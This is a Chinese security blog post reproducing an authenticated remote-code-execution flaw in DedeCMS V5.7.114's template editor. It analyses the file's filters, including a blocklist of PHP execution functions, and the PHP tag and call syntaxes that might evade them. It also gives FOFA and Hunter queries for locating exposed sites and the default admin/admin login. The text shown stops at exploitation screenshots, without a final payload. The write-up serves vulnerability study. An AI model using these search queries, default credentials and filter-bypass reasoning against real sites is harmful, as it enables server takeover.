

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="August Rosenberg">
  <meta name="keywords" content="">
  
    <meta name="description" content="0x01 产品简介 织梦内容管理系统(DedeCMS)，是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS)，他拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。 0x02 漏洞描述DedeCMS V5.7.114 存在远程代码执行漏洞。造成此漏洞的原因是，尽管article_template_rand.php对编辑的文件施加了一定的限制，">
<meta property="og:type" content="article">
<meta property="og:title" content="DedeCMSV5.7.114后台article_template_rand.php存在rce漏洞">
<meta property="og:url" content="https://tsy244.github.io/2024/07/30/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/DedeCMSV5-7-114%E5%90%8E%E5%8F%B0article-template-rand-php%E5%AD%98%E5%9C%A8rce%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="AU9U5T">
<meta property="og:description" content="0x01 产品简介 织梦内容管理系统(DedeCMS)，是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS)，他拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。 0x02 漏洞描述DedeCMS V5.7.114 存在远程代码执行漏洞。造成此漏洞的原因是，尽管article_template_rand.php对编辑的文件施加了一定的限制，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730142449947.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730141746983.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730141847082.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730142630401.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730144142133.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730144424207.png">
<meta property="og:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730154437336.png">
<meta property="article:published_time" content="2024-07-30T01:56:54.000Z">
<meta property="article:modified_time" content="2024-07-30T08:16:36.543Z">
<meta property="article:author" content="August Rosenberg">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730142449947.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>DedeCMSV5.7.114后台article_template_rand.php存在rce漏洞 - AU9U5T</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"tsy244.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":90,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":"G-BL1W5LRRDJ","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>AU9U5T&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="DedeCMSV5.7.114后台article_template_rand.php存在rce漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        August Rosenberg
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-30 09:56" pubdate>
          July 30, 2024 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          8.4k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          71 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">DedeCMSV5.7.114后台article_template_rand.php存在rce漏洞</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0x01-产品简介"><a href="#0x01-产品简介" class="headerlink" title="0x01 产品简介"></a>0x01 产品简介</h2><p> 织梦内容管理系统(DedeCMS)，是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS)，他拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。</p>
<h2 id="0x02-漏洞描述"><a href="#0x02-漏洞描述" class="headerlink" title="0x02 漏洞描述"></a>0x02 漏洞描述</h2><p>DedeCMS V5.7.114 存在远程代码执行漏洞。造成此漏洞的原因是，尽管article_template_rand.php对编辑的文件施加了一定的限制，但攻击者仍然可以绕过这些限制并以某种方式编写代码，从而允许经过身份验证的攻击者利用该漏洞执行任意命令并获得系统权限。</p>
<h2 id="0x03-影响版本"><a href="#0x03-影响版本" class="headerlink" title="0x03 影响版本"></a>0x03 影响版本</h2><p>DedeCMS V5.7.114</p>
<h2 id="0x04-搜索语法"><a href="#0x04-搜索语法" class="headerlink" title="0x04 搜索语法"></a>0x04 搜索语法</h2><p>FOFA</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">app</span><span class="hljs-operator">=</span><span class="hljs-string">&quot;DedeCMS网站内容管理系统&quot;</span><br></code></pre></td></tr></table></figure>

<p>hunter</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">app.name</span>=<span class="hljs-string">&quot;DedeCMS&quot;</span><br></code></pre></td></tr></table></figure>



<h2 id="0x05-漏洞复现"><a href="#0x05-漏洞复现" class="headerlink" title="0x05 漏洞复现"></a>0x05 漏洞复现</h2><p>该漏洞是由于article_template_rand.php 的限制，没有过滤充分，导致攻击者可以绕过这个从而实现rce</p>
<p>根据php 代码可以发现有以下的过滤</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&quot;#(/\*)[\s\S]*(\*/)#i&quot;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$content</span>);<br></code></pre></td></tr></table></figure>

<p>可以理解为去除了注释&#x2F;**&#x2F;</p>
<p>可能是为了方式内联形式的攻击语句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">dede_htmlspecialchars</span>(<span class="hljs-params"><span class="hljs-variable">$str</span></span>) </span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$cfg_soft_lang</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">version_compare</span>(PHP_VERSION, <span class="hljs-string">&#x27;5.4.0&#x27;</span>, <span class="hljs-string">&#x27;&lt;&#x27;</span>)) <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>, ENT_QUOTES);<br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$cfg_soft_lang</span>==<span class="hljs-string">&#x27;gb2312&#x27;</span>) <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>, ENT_QUOTES, <span class="hljs-string">&#x27;ISO-8859-1&#x27;</span>);<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-variable">$str</span>, ENT_QUOTES);<br>&#125;<br></code></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">global</span> <span class="hljs-variable">$cfg_disable_funs</span>;<br><span class="hljs-variable">$cfg_disable_funs</span> = <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$cfg_disable_funs</span>) ? <span class="hljs-variable">$cfg_disable_funs</span> : <span class="hljs-string">&#x27;phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace&#x27;</span>;<br><span class="hljs-variable">$cfg_disable_funs</span> = <span class="hljs-variable">$cfg_disable_funs</span>.<span class="hljs-string">&#x27;,[$]GLOBALS,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,require,create_function,array_map,call_user_func,call_user_func_array,array_filert&#x27;</span>;<br><span class="hljs-keyword">foreach</span> (<span class="hljs-title function_ invoke__">explode</span>(<span class="hljs-string">&quot;,&quot;</span>, <span class="hljs-variable">$cfg_disable_funs</span>) <span class="hljs-keyword">as</span> <span class="hljs-variable">$value</span>) &#123;<br>    <span class="hljs-variable">$value</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot; &quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$value</span>);<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$value</span>) &amp;&amp; <span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;#[^a-z]+[&#x27;\&quot;]*<span class="hljs-subst">&#123;$value&#125;</span>[&#x27;\&quot;]*[\s]*[([&#123;&#x27;]#i&quot;</span>, <span class="hljs-string">&quot; <span class="hljs-subst">&#123;$content&#125;</span>&quot;</span>) == <span class="hljs-literal">TRUE</span>) &#123;<br>        <span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">dede_htmlspecialchars</span>(<span class="hljs-variable">$content</span>);<br>        <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-variable">$m_file</span>,<span class="hljs-string">&#x27;w&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-string">&#x27;&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="hljs-subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>$cfg_disable_funs 添加了代码执行&#x2F;命令执行相关和可能造成危险的黑名单，防止被调用造成rce </p>
<p>然后使用一个foreach 进行逐个匹配</p>
<p>如何发现了函数名前存在任何的非小写字符，前后时候存在<code>&#39;\&quot;</code> 这三个字符，函数名后是否存在空格，或者函数调用时使用的字符，将会进行转义</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;#^[\s\S]+&lt;\?(php|=)?[\s]+#i&quot;</span>, <span class="hljs-string">&quot; <span class="hljs-subst">&#123;$content&#125;</span>&quot;</span>) == <span class="hljs-literal">TRUE</span>) &#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU&quot;</span>, <span class="hljs-string">&quot; <span class="hljs-subst">&#123;$content&#125;</span>&quot;</span>) == <span class="hljs-literal">TRUE</span>) &#123;<br>        <span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">dede_htmlspecialchars</span>(<span class="hljs-variable">$content</span>);<br>        <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-variable">$m_file</span>,<span class="hljs-string">&#x27;w&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-string">&#x27;&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="hljs-subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU&quot;</span>, <span class="hljs-string">&quot; <span class="hljs-subst">&#123;$content&#125;</span>&quot;</span>) == <span class="hljs-literal">TRUE</span>) &#123;<br>        <span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">dede_htmlspecialchars</span>(<span class="hljs-variable">$content</span>);<br>        <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-variable">$m_file</span>,<span class="hljs-string">&#x27;w&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-string">&#x27;&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="hljs-subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;#[`][\s\S]*[`]#i&quot;</span>, <span class="hljs-string">&quot; <span class="hljs-subst">&#123;$content&#125;</span>&quot;</span>) == <span class="hljs-literal">TRUE</span>) &#123;<br>        <span class="hljs-variable">$content</span> = <span class="hljs-title function_ invoke__">dede_htmlspecialchars</span>(<span class="hljs-variable">$content</span>);<br>        <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-variable">$m_file</span>,<span class="hljs-string">&#x27;w&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$fp</span>, <span class="hljs-string">&#x27;&#x27;</span>);<br>        <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="hljs-subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$okmsg</span> = <span class="hljs-string">&#x27;成功保存配置信息 AT:(&#x27;</span>.<span class="hljs-title function_ invoke__">MyDate</span>(<span class="hljs-string">&#x27;H:i:s&#x27;</span>, <span class="hljs-title function_ invoke__">time</span>()).<span class="hljs-string">&#x27;)&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>第一个if 检测了php 代码开始的标志，如果有就会进入更严格的处理</p>
<blockquote>
<p>php开始的标志</p>
<ol>
<li>以”&lt;?”开始和以”&gt;”结束是PHP&#x2F;FI 2.0 的标记，已经被替换。</li>
<li>以”&lt;?php”开始和以”?&gt;”结束是PHP 3.0开始的标准标记</li>
<li>以”&lt;?”开始和以”?&gt;”结束是PHP 3.0开始的标记，通过 php.ini 配置文件中的short_open_tag选项打开</li>
<li>以”&lt;script language&#x3D;”php”&gt;”开始和以”&lt;&#x2F;script&gt;”结束是PHP 3.0开始的标记已经废弃。</li>
<li>以”&lt;%”开始和以”%&gt;”结束是PHP 3.0.4开始的标记</li>
</ol>
</blockquote>
<p>内层第一个if </p>
<p>匹配的是函数的调用过程</p>
<p>先匹配函数名调用还是，变量调用，然后匹配任意的参数，一直到) 然后进行空格和<code>;</code>的匹配</p>
<p>iU 关闭贪婪模式</p>
<blockquote>
<p>函数的调用过程</p>
<ol>
<li><p>无参数调用</p>
</li>
<li><p>带有参数调用</p>
</li>
<li><p>默认参数调用</p>
</li>
<li><p>可变参数调用</p>
</li>
<li><p>匿名函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$numbers</span> = [<span class="hljs-number">8</span>, <span class="hljs-number">9</span>, <span class="hljs-number">10</span>, <span class="hljs-number">11</span>, <span class="hljs-number">12</span>, <span class="hljs-number">13</span>, <span class="hljs-number">0</span>, <span class="hljs-number">15</span>];<br><span class="hljs-title function_ invoke__">usort</span>(<span class="hljs-variable">$numbers</span>, function (<span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span>) &#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$a</span> - <span class="hljs-variable">$b</span>;<br>    &#125;);<br><span class="hljs-title function_ invoke__">print_r</span>(<span class="hljs-variable">$numbers</span>);<br><br></code></pre></td></tr></table></figure>
</li>
<li><p>引用传递参数</p>
</li>
<li><p>使用可选参数</p>
</li>
<li><p>使用数组展开</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">add</span>(<span class="hljs-params"><span class="hljs-variable">$a</span>, <span class="hljs-variable">$b</span></span>) </span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$a</span> + <span class="hljs-variable">$b</span>;<br>&#125;<br><br><span class="hljs-variable">$args</span> = [<span class="hljs-number">10</span>, <span class="hljs-number">20</span>];<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">add</span>(...<span class="hljs-variable">$args</span>); <span class="hljs-comment">// 输出: 30</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>使用命名参数(php 8.1 及以上)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">person_info</span>(<span class="hljs-params"><span class="hljs-keyword">string</span> <span class="hljs-variable">$name</span>, <span class="hljs-keyword">int</span> <span class="hljs-variable">$age</span>, <span class="hljs-keyword">string</span> <span class="hljs-variable">$gender</span> = <span class="hljs-string">&quot;male&quot;</span></span>) </span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;<span class="hljs-subst">$name</span> is <span class="hljs-subst">$age</span> years old and is <span class="hljs-subst">$gender</span>.&quot;</span>;<br>&#125;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">person_info</span>(<span class="hljs-attr">name</span>: <span class="hljs-string">&quot;John&quot;</span>, <span class="hljs-attr">age</span>: <span class="hljs-number">30</span>, <span class="hljs-attr">gender</span>: <span class="hljs-string">&quot;female&quot;</span>); <span class="hljs-comment">// 输出: John is 30 years old and is female.</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>使用匿名函数作为回调</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">array_map</span>(function(<span class="hljs-variable">$item</span>) &#123; <span class="hljs-keyword">return</span> <span class="hljs-variable">$item</span> * <span class="hljs-number">2</span>; &#125;, [<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">3</span>]);<br><span class="hljs-comment">// 输出: Array ( [0] =&gt; 2 [1] =&gt; 4 [2] =&gt; 6 )</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>使用对象方法作为回调</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Math</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">double</span>(<span class="hljs-params"><span class="hljs-variable">$num</span></span>) </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$num</span> * <span class="hljs-number">2</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$math</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Math</span>();<br><span class="hljs-title function_ invoke__">array_map</span>([<span class="hljs-variable">$math</span>, <span class="hljs-string">&#x27;double&#x27;</span>], [<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">3</span>]);<br><span class="hljs-comment">// 输出: Array ( [0] =&gt; 2 [1] =&gt; 4 [2] =&gt; 6 )</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>使用变量函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$func_name</span> = <span class="hljs-string">&#x27;strtoupper&#x27;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$func_name</span>(<span class="hljs-string">&quot;hello world&quot;</span>); <span class="hljs-comment">// 输出: HELLO WORLD</span><br></code></pre></td></tr></table></figure>
</li>
<li><p>带上@ 符号的函数调用</p>
</li>
</ol>
</blockquote>
<p>内层第二个if </p>
<p>主要还是用于匹配函数的调用</p>
<p>防止使用@ 符号的函数调用</p>
<p>内层第三个if</p>
<p>主要是为了防止命令执行``</p>
<p>如果上面的过程都通过了的话</p>
<p>那么就会将我们的模板放入.&#x2F;data&#x2F;template.rand.php</p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730142449947.png" srcset="/img/loading.gif" lazyload alt="image-20240730142449947"></p>
<p>利用过程</p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730141746983.png" srcset="/img/loading.gif" lazyload alt="image-20240730141746983"></p>
<p>织梦官方默认admin&#x2F;admin</p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730141847082.png" srcset="/img/loading.gif" lazyload alt="image-20240730141847082"></p>
